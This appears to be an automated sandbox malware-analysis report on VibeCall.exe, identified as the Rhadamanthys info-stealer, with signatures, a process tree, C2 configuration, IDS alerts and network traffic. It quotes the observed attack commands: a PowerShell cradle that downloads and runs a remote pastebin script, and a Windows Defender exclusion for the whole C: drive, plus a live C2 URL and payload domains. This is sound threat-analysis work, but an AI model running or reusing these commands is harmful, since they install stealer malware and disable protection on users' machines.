
Windows Analysis Report
VibeCall.exe

Overview

General Information

Sample name: VibeCall.exe
Analysis ID: 1626653
MD5: fd33e9b2d26a30171852031ae407bef5
SHA1: 646d2c13230c5b64cf0e518996d5ce9883a53e26
SHA256: b63367bd7da5aad9afef5e7531cac4561c8a671fd2270ade14640cf03849bf52
Tags: CrazyEvil, exe, NoLogs, February, user-g0njxa

Detection

RHADAMANTHYS
Score: 84
Range: 0 - 100
Confidence: 100%

Compliance

Score: 63
Range: 0 - 100

Signatures

Found malware configuration
Suricata IDS alerts for network traffic
Yara detected RHADAMANTHYS Stealer
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Drops PE files to the user root directory
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: PowerShell Download and Execution Cradles
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Uses known network protocols on non-standard ports
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: PowerShell Web Download
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious DNS Query for IP Lookup Service APIs
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic

Classification

  • System is w10x64
  • VibeCall.exe (PID: 7640 cmdline: "C:\Users\user\Desktop\VibeCall.exe" MD5: FD33E9B2D26A30171852031AE407BEF5)
    • powershell.exe (PID: 7852 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 8020 cmdline: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/ySSytGm5" -UseBasicParsing).Content" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 3748 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • aisolution_vibecall_a.exe (PID: 5936 cmdline: "C:\Users\user\aisolution_vibecall_a.exe" MD5: 6628422BEF4B51DC34FA30EEA184E2BE)
      • fontdrvhost.exe (PID: 5816 cmdline: "C:\Windows\System32\fontdrvhost.exe" MD5: 8D0DA0C5DCF1A14F9D65F5C0BEA53F3D)
        • fontdrvhost.exe (PID: 2892 cmdline: "C:\Windows\System32\fontdrvhost.exe" MD5: BBCB897697B3442657C7D6E3EDDBD25F)
          • WerFault.exe (PID: 5448 cmdline: C:\Windows\system32\WerFault.exe -u -p 2892 -s 136 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
      • WerFault.exe (PID: 5236 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5936 -s 624 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • WerFault.exe (PID: 4180 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5936 -s 652 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • contry_solution_vibecall_e.exe (PID: 7520 cmdline: "C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exe" MD5: A43F99E94BC661D7B8C675A2C58DA107)
      • fontdrvhost.exe (PID: 2116 cmdline: "C:\Windows\System32\fontdrvhost.exe" MD5: 8D0DA0C5DCF1A14F9D65F5C0BEA53F3D)
        • fontdrvhost.exe (PID: 6524 cmdline: "C:\Windows\System32\fontdrvhost.exe" MD5: BBCB897697B3442657C7D6E3EDDBD25F)
      • WerFault.exe (PID: 3496 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7520 -s 652 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • WerFault.exe (PID: 940 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7520 -s 628 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • soundsolution_vibecall_c.exe (PID: 2056 cmdline: "C:\Users\user\Downloads\soundsolution_vibecall_c.exe" MD5: 3AFA1599179F4EEA93CC1E38D1480731)
      • OpenWith.exe (PID: 6500 cmdline: "C:\Windows\system32\openwith.exe" MD5: 0ED31792A7FFF811883F80047CBCFC91)
      • WerFault.exe (PID: 6616 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2056 -s 480 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • videosolution_vibecall_b.exe (PID: 8116 cmdline: "C:\Users\user\Downloads\videosolution_vibecall_b.exe" MD5: 999041299FD11008A384B66BCAEE5BD4)
      • WerFault.exe (PID: 6488 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 8116 -s 252 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
Name: Rhadamanthys
Description: According to PCrisk, Rhadamanthys is a stealer-type malware, and as its name implies - it is designed to extract data from infected machines. At the time of writing, this malware is spread through malicious websites mirroring those of genuine software such as AnyDesk, Zoom, Notepad++, and others. Rhadamanthys is downloaded alongside the real program, thus diminishing immediate user suspicion. These sites were promoted through Google ads, which superseded the legitimate search results on the Google search engine.
Attribution: Sandworm
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.rhadamanthys
{"C2 url": "https://98.142.253.232:9364/1371e7f0dcdc621666fa156/KevlandPro"}
Source | Rule | Description | Author | Strings
00000011.00000003.2761352961.0000000005010000.00000004.00000001.00020000.00000000.sdmp | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |
0000001A.00000003.2635389333.0000000005550000.00000004.00000001.00020000.00000000.sdmp | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |
00000020.00000003.2673636720.0000000005470000.00000004.00000001.00020000.00000000.sdmp | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |
0000000F.00000003.2613199093.0000000000A50000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_RHADAMANTHYS | Yara detected RHADAMANTHYS Stealer | Joe Security |
00000020.00000003.2674081436.0000000005690000.00000004.00000001.00020000.00000000.sdmp | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |
Source | Rule | Description | Author | Strings
17.3.soundsolution_vibecall_c.exe.4df0000.2.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |
17.3.soundsolution_vibecall_c.exe.5010000.7.raw.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |
16.3.contry_solution_vibecall_e.exe.36b0000.7.raw.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |
32.3.fontdrvhost.exe.5690000.7.raw.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |
44.3.OpenWith.exe.5010000.7.raw.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/ySSytGm5" -UseBasicParsing).Content", CommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/ySSytGm5" -UseBasicParsing).Content", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\VibeCall.exe", ParentImage: C:\Users\user\Desktop\VibeCall.exe, ParentProcessId: 7640, ParentProcessName: VibeCall.exe, ProcessCommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/ySSytGm5" -UseBasicParsing).Content", ProcessId: 8020, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\VibeCall.exe", ParentImage: C:\Users\user\Desktop\VibeCall.exe, ParentProcessId: 7640, ParentProcessName: VibeCall.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', ProcessId: 7852, ProcessName: powershell.exe
Source: Process started | Author: frack113 | Data: Command: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/ySSytGm5" -UseBasicParsing).Content", CommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/ySSytGm5" -UseBasicParsing).Content", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\VibeCall.exe", ParentImage: C:\Users\user\Desktop\VibeCall.exe, ParentProcessId: 7640, ParentProcessName: VibeCall.exe, ProcessCommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/ySSytGm5" -UseBasicParsing).Content", ProcessId: 8020, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/ySSytGm5" -UseBasicParsing).Content", CommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/ySSytGm5" -UseBasicParsing).Content", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\VibeCall.exe", ParentImage: C:\Users\user\Desktop\VibeCall.exe, ParentProcessId: 7640, ParentProcessName: VibeCall.exe, ProcessCommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/ySSytGm5" -UseBasicParsing).Content", ProcessId: 8020, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\VibeCall.exe", ParentImage: C:\Users\user\Desktop\VibeCall.exe, ParentProcessId: 7640, ParentProcessName: VibeCall.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', ProcessId: 7852, ProcessName: powershell.exe
Source: DNS query | Author: Brandon George (blog post), Thomas Patzke | Data: Image: C:\Users\user\Desktop\VibeCall.exe, QueryName: ip-api.com
Source: Process started | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger | Data: Command: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/ySSytGm5" -UseBasicParsing).Content", CommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/ySSytGm5" -UseBasicParsing).Content", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\VibeCall.exe", ParentImage: C:\Users\user\Desktop\VibeCall.exe, ParentProcessId: 7640, ParentProcessName: VibeCall.exe, ProcessCommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/ySSytGm5" -UseBasicParsing).Content", ProcessId: 8020, ProcessName: powershell.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\VibeCall.exe", ParentImage: C:\Users\user\Desktop\VibeCall.exe, ParentProcessId: 7640, ParentProcessName: VibeCall.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', ProcessId: 7852, ProcessName: powershell.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-02-28T18:04:34.080139+0100 | 2854824 | 2 | Potentially Bad Traffic | 98.142.253.232 | 9364 | 192.168.2.4 | 59636 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-02-28T18:03:12.548144+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 59320 | 188.114.97.3 | 80 | TCP
2025-02-28T18:03:19.575661+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 59322 | 188.114.97.3 | 80 | TCP
2025-02-28T18:03:24.756146+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 59323 | 188.114.97.3 | 80 | TCP
2025-02-28T18:03:26.143896+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 59324 | 172.67.74.152 | 80 | TCP
2025-02-28T18:03:26.628289+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 59325 | 208.95.112.1 | 80 | TCP
2025-02-28T18:03:31.012033+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 59340 | 188.114.97.3 | 80 | TCP
2025-02-28T18:03:33.503311+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 59356 | 172.67.74.152 | 80 | TCP
2025-02-28T18:03:33.706438+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 59325 | 208.95.112.1 | 80 | TCP
2025-02-28T18:03:38.034560+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 59387 | 172.67.74.152 | 80 | TCP
2025-02-28T18:03:38.112691+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 59325 | 208.95.112.1 | 80 | TCP
2025-02-28T18:03:44.768985+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 59450 | 172.67.74.152 | 80 | TCP
2025-02-28T18:03:44.956507+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 59325 | 208.95.112.1 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-02-28T18:04:11.055722+0100 | 2854802 | 1 | Domain Observed Used for C2 Detected | 171.22.120.233 | 4955 | 192.168.2.4 | 59604 | TCP
2025-02-28T18:04:15.060477+0100 | 2854802 | 1 | Domain Observed Used for C2 Detected | 79.141.162.188 | 5101 | 192.168.2.4 | 59627 | TCP
2025-02-28T18:04:25.165053+0100 | 2854802 | 1 | Domain Observed Used for C2 Detected | 98.142.253.232 | 9364 | 192.168.2.4 | 59635 | TCP
2025-02-28T18:04:34.080139+0100 | 2854802 | 1 | Domain Observed Used for C2 Detected | 98.142.253.232 | 9364 | 192.168.2.4 | 59636 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-02-28T18:02:46.493535+0100 | 1810000 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49739 | 104.20.4.235 | 443 | TCP

AV Detection

Source: 17.3.soundsolution_vibecall_c.exe.1720000.8.unpack | Malware Configuration Extractor: Rhadamanthys {"C2 url": "https://98.142.253.232:9364/1371e7f0dcdc621666fa156/KevlandPro"}
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability

Compliance

Source: VibeCall.exe | Static PE information: certificate valid
Source: unknown | HTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.16.248.249:443 -> 192.168.2.4:59621 version: TLS 1.2
Source: VibeCall.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: n=4.pDbZ source: powershell.exe, 0000000C.00000002.2279960715.000001A65A6A5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wkernel32.pdb source: aisolution_vibecall_a.exe, 0000000F.00000003.2616028388.00000000037B0000.00000004.00000001.00020000.00000000.sdmp, aisolution_vibecall_a.exe, 0000000F.00000003.2616337623.00000000038D0000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wkernelbase.pdb source: aisolution_vibecall_a.exe, 0000000F.00000003.2617234847.00000000039D0000.00000004.00000001.00020000.00000000.sdmp, aisolution_vibecall_a.exe, 0000000F.00000003.2616935783.00000000037B0000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ntdll.pdb source: aisolution_vibecall_a.exe, 0000000F.00000003.2614078670.00000000037B0000.00000004.00000001.00020000.00000000.sdmp, aisolution_vibecall_a.exe, 0000000F.00000003.2614307760.00000000039A0000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: aisolution_vibecall_a.exe, 0000000F.00000003.2615457441.0000000003950000.00000004.00000001.00020000.00000000.sdmp, aisolution_vibecall_a.exe, 0000000F.00000003.2614813306.00000000037B0000.00000004.00000001.00020000.00000000.sdmp, contry_solution_vibecall_e.exe, 00000010.00000003.2662183332.0000000002960000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ntdll.pdbUGP source: aisolution_vibecall_a.exe, 0000000F.00000003.2614078670.00000000037B0000.00000004.00000001.00020000.00000000.sdmp, aisolution_vibecall_a.exe, 0000000F.00000003.2614307760.00000000039A0000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: aisolution_vibecall_a.exe, 0000000F.00000003.2615457441.0000000003950000.00000004.00000001.00020000.00000000.sdmp, aisolution_vibecall_a.exe, 0000000F.00000003.2614813306.00000000037B0000.00000004.00000001.00020000.00000000.sdmp, contry_solution_vibecall_e.exe, 00000010.00000003.2662183332.0000000002960000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\Corehost.Static\singlefilehost.pdb source: VibeCall.exe, 00000000.00000000.1744985265.00007FF689FED000.00000002.00000001.01000000.00000003.sdmp
Source: Binary string: wkernel32.pdbUGP source: aisolution_vibecall_a.exe, 0000000F.00000003.2616028388.00000000037B0000.00000004.00000001.00020000.00000000.sdmp, aisolution_vibecall_a.exe, 0000000F.00000003.2616337623.00000000038D0000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wkernelbase.pdbUGP source: aisolution_vibecall_a.exe, 0000000F.00000003.2617234847.00000000039D0000.00000004.00000001.00020000.00000000.sdmp, aisolution_vibecall_a.exe, 0000000F.00000003.2616935783.00000000037B0000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\dlls\mscordac\mscordaccore.pdb source: VibeCall.exe, 00000000.00000000.1745566151.00007FF68A1F2000.00000002.00000001.01000000.00000003.sdmp
Source: C:\Windows\System32\fontdrvhost.exe | Code function: 4x nop then dec esp | 37_2_00000228E9920511
Source: C:\Windows\System32\fontdrvhost.exe | Code function: 4x nop then dec esp | 43_2_000001C328260511

Networking

Source: Network traffic | Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 171.22.120.233:4955 -> 192.168.2.4:59604
Source: Network traffic | Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 79.141.162.188:5101 -> 192.168.2.4:59627
Source: Network traffic | Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 98.142.253.232:9364 -> 192.168.2.4:59635
Source: Network traffic | Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 98.142.253.232:9364 -> 192.168.2.4:59636
Source: Malware configuration extractor | URLs: https://98.142.253.232:9364/1371e7f0dcdc621666fa156/KevlandPro
Source: unknown | DNS query: name: pastebin.com
Source: unknown | Network traffic detected: HTTP traffic on port 59327 -> 5000
Source: unknown | Network traffic detected: HTTP traffic on port 5000 -> 59327
Source: unknown | Network traffic detected: HTTP traffic on port 59368 -> 5000
Source: unknown | Network traffic detected: HTTP traffic on port 5000 -> 59368
Source: unknown | Network traffic detected: HTTP traffic on port 59408 -> 5000
Source: unknown | Network traffic detected: HTTP traffic on port 5000 -> 59408
Source: unknown | Network traffic detected: HTTP traffic on port 59464 -> 5000
Source: unknown | Network traffic detected: HTTP traffic on port 5000 -> 59464
Source: global traffic | TCP traffic: 192.168.2.4:59327 -> 147.45.60.20:5000
Source: global traffic | TCP traffic: 192.168.2.4:59604 -> 171.22.120.233:4955
Source: global traffic | TCP traffic: 192.168.2.4:59627 -> 79.141.162.188:5101
Source: global traffic | TCP traffic: 192.168.2.4:59316 -> 162.159.36.2:53
Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Date: Fri, 28 Feb 2025 17:03:12 GMT | Content-Type: application/octet-stream | Content-Length: 16307410 | Connection: keep-alive | Last-Modified: Wed, 26 Feb 2025 13:18:16 GMT | ETag: "67bf1498-f8d4d2" | Cache-Control: max-age=14400 | CF-Cache-Status: HIT | Age: 743 | Accept-Ranges: bytes | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Qx8WDb%2FbRPnXgSyvm0gbzezirEaua%2FLaeSrWUz9WsXrHeVm1lwDeaIBFyGVovdzXw1nZW%2B5vsiTnX1LhLmsth6DCR7Rwdf13NGVZMSNRftO5Pg0nFWfcji%2F8R6cLtWZfNNI84gAg2iRueoQ%3D"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | Server: cloudflare | CF-RAY: 9191fc970c7717e9-EWR | alt-svc: h3=":443"; ma=86400 | server-timing: cfL4;desc="?proto=TCP&rtt=1497&min_rtt=1497&rtt_var=748&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=85&delivery_rate=0&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" | Data Ascii: MZ@!L!This program cannot be run in DOS mode.$=|\\\7\7\7\\J!\J!\J!\\\\\\!\\\Rich\PEL5g*F
Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Date: Fri, 28 Feb 2025 17:03:19 GMT | Content-Type: application/octet-stream | Content-Length: 16308031 | Connection: keep-alive | Last-Modified: Wed, 26 Feb 2025 13:38:33 GMT | ETag: "67bf1959-f8d73f" | Cache-Control: max-age=14400 | CF-Cache-Status: MISS | Accept-Ranges: bytes | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w59j9%2FnmIFT7kTY9SaTNNViNCzRnQ4BRkCW3D1ymHZe7aRBeLtJuGRK4By62v%2FjS0OfvoDqobEDNFWBZtoevpViuzIUW1Y%2BHpkGKC8OqniMG8ytS5Qrv2E6hN5e39%2FXrKkCykVdc9u%2BVw%2BE%3D"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | Server: cloudflare | CF-RAY: 9191fcc08c8d4244-EWR | alt-svc: h3=":443"; ma=86400 | server-timing: cfL4;desc="?proto=TCP&rtt=2205&min_rtt=2205&rtt_var=1102&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=90&delivery_rate=0&cwnd=232&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" | Data Ascii: MZ@!L!This program cannot be run in DOS mode.$=|\\\7\7\7\\J!\J!\J!\\\\\\!\\\Rich\PEL5g*F
Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Date: Fri, 28 Feb 2025 17:03:24 GMT | Content-Type: application/octet-stream | Content-Length: 15991506 | Connection: keep-alive | Last-Modified: Wed, 26 Feb 2025 13:24:58 GMT | ETag: "67bf162a-f402d2" | Cache-Control: max-age=14400 | CF-Cache-Status: REVALIDATED | Accept-Ranges: bytes | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bkvWrOpQ5VlYARFaySrPlg9CFei2yho19fhjdFAZfImRLa2mNkHw%2Fgm5PdqrwC%2BwMSM5a3sy8ir%2FPE6TpTP1RmoZ%2FrJsVBogVN%2FU28wkz910Sx7PRa94t649DivVXKyOHJvuca88Mi6DgK0%3D"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | Server: cloudflare | CF-RAY: 9191fce21dfcc3eb-EWR | alt-svc: h3=":443"; ma=86400 | server-timing: cfL4;desc="?proto=TCP&rtt=1467&min_rtt=1467&rtt_var=733&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=88&delivery_rate=0&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" | Data Ascii: MZ@!L!This program cannot be run in DOS mode.$=|\\\7\7\7\\J!\J!\J!\\\\\\!\\\Rich\PEL5g*R
Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Date: Fri, 28 Feb 2025 17:03:30 GMT | Content-Type: application/octet-stream | Content-Length: 16010620 | Connection: keep-alive | Last-Modified: Wed, 26 Feb 2025 13:31:47 GMT | ETag: "67bf17c3-f44d7c" | Cache-Control: max-age=14400 | CF-Cache-Status: MISS | Accept-Ranges: bytes | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=D3lWBWxAX7clCp7V8v7IEa8aO%2FNLLEZMq2PnohyzyNqGq1zkQ%2Bl5EbOwa2QiPLGsRo5XLAHDu520T%2BQQFcWB6%2FrC21YJ6gSQLfwsVVl0RE%2Bs2EqwIxzHQkIMmFfSKcOBX0mGUj%2BNRnIqsGQ%3D"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | Server: cloudflare | CF-RAY: 9191fd07fb532223-EWR | alt-svc: h3=":443"; ma=86400 | server-timing: cfL4;desc="?proto=TCP&rtt=2012&min_rtt=2012&rtt_var=1006&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=88&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" | Data Ascii: MZ@!L!This program cannot be run in DOS mode.$=|\\\7\7\7\\J!\J!\J!\\\\\\!\\\Rich\PEL5g*FR
                      Source: global trafficHTTP traffic detected: GET /downloads/aisolution_vibecall_a.exe HTTP/1.1Host: rustaisolutionnorisk.com
                      Source: global trafficHTTP traffic detected: GET /downloads/contry_solution_vibecall_e.exe HTTP/1.1Host: rustaisolutionnorisk.com
